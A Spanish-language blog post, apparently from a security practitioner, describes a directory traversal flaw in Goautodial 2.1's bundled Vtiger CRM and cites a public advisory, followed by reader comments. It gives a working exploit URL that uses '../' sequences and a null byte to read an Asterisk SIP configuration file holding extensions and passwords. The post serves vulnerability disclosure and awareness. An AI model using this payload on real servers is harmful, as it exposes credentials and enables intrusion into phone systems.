Inicio > Manuales y tutoriales > Vulnerabilidad de directorios transversales en Goautodial 2.1

Vulnerabilidad de directorios transversales en Goautodial 2.1

Como saben este famoso software de marcación predictiva, trae Vtiger como software para CRM, por defecto, ultimamente estoy trabajando mucho con este software, así que, como siempre no esta demás probar, como dirían los colegas “las fijas”.

A través de Vtiger, es posible explotar una vulnerabilidad que permite visualizar los archivos locales del servidor goautodial, mediante la manipulación de URL , esto sucede en Goautodial 2.1 , aquí algunos ejemplos.

1.- Detectando Vtiger en Goautodial 2.1

goautodial-21-fileinclution

2.- Explotando la vulnerabilidad , visualizando el archivo de troncales, extensiones y contraseñas

goautodial-21-fileinclution

URL : http://IP/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/asterisk/sip-vicidial.conf%00

Si bien es cierto, esta es una vulnerabilidad ya reportada en vtiger (http://osvdb.org/show/osvdb/80552) , al parecer la gente de Goautodial aun no corrige la versión.

Bueno espero les sirva la información y a tomar sus recaudos

UPDATE 20/03/2014

Hace poco me hicieron una entrevista en donde, me filmaron haciendo una demostración de esta vulnerabilidad , a continuación les comparto el vídeo:

Anuncios
Categorías:Manuales y tutoriales
  1. marzo 2, 2013 de 4:27 pm

    I enjoyed having a look at this Blog.
    Free Software has really been making or performing a new school and opening mind for free Software Technology.
    Either we get along and try to work in community, or new challenges will make us face hard failure.

    Congratulations for your initiatives and courage to start helping people to develop their own devices on Linux, Open Source.

    Go ahead supporting new discoveries and new way to see the New World.
    Stark

    • marzo 20, 2014 de 5:48 pm

      Thank you very much!!
      Regards
      Juan Oliva

  2. Armitage1989
    marzo 23, 2014 de 8:26 pm

    hola bro que tal como estas una pregunta cual es su correo electronico muchas gracias

    • marzo 26, 2014 de 2:01 pm

      Hola Armitage1989

      Mi correo y hangout es jroliva at gmail.com

      Saludos
      Juan Oliva

  1. junio 17, 2013 de 4:44 am

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión /  Cambiar )

Google photo

Estás comentando usando tu cuenta de Google. Cerrar sesión /  Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión /  Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión /  Cambiar )

Conectando a %s

A %d blogueros les gusta esto: